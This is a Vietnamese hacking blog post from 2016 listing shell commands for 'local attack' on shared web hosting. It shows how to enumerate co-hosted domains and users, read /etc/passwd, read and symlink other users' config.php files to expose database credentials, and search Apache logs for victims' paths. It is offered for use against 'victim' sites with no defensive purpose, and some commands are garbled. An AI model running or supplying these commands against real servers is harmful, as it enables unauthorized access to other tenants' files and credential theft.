Thứ Ba, 15 tháng 3, 2016
0 nhận xét

Tổng hợp những lệnh shell hay dùng khi local attack


1) Xem list domain & user trên cùng sever

directadmin: cat /etc/virtual/domainowners
cpanel: ls -la /etc/valiases/tendomainvictim.com
cd/etc/vdomainaliases;ls-lia
Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào
cd/etc/vdomainaliases && ls-lia

2)Xem tên user: tùy vào distro linux khác nhau sẽ có các câu lệnh đọc file khác nhau.

cat /etc/passwd
less /etc/passwd
more /etc/passwd
head /etc/passwd
tac /etc/passwd r
ev /etc/passwd
xxd /etc/passwd

3)Local sang victim bằng lệnh dir ( 2013 - giờ hiếm server nào còn sài được)

dir /home/ten user can local/public_html
vd: dir /home/vhb/public_html

4)Xem nội dung file lệnh xem file cũng tương tự như mục số 2

-> có thể sài các lệnh đó thay thế cho cat, less,...
cat/home/ten user can local/public_html/index.php
vd: cat /home/vhb/public_html/@vhb@/includes/config.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php

5) Symlink: tác dụng gần giống như tạo shorcut trên windows.

ln -s/home/ten user can local/public_html/index.php index.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
với file 1.txt hay 1.ini là mình tự đặt để nó tạo liên kết từ file config.php đến.

6) Tìm path của mấy victim sài Add on domain

find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'victim.com'
----------------------------------------------

Tác giả: concobe - VHB Group
Cảm ơn các bạn đã ghé thăm blog facexinhvn, Hãy để lại 1 lời bình để ủng hộ ra nhiều thứ mới và hay nhất!

Next
This is the most recent post.
Bài đăng Cũ hơn

0 nhận xét:

Đăng nhận xét

 
Toggle Footer
Top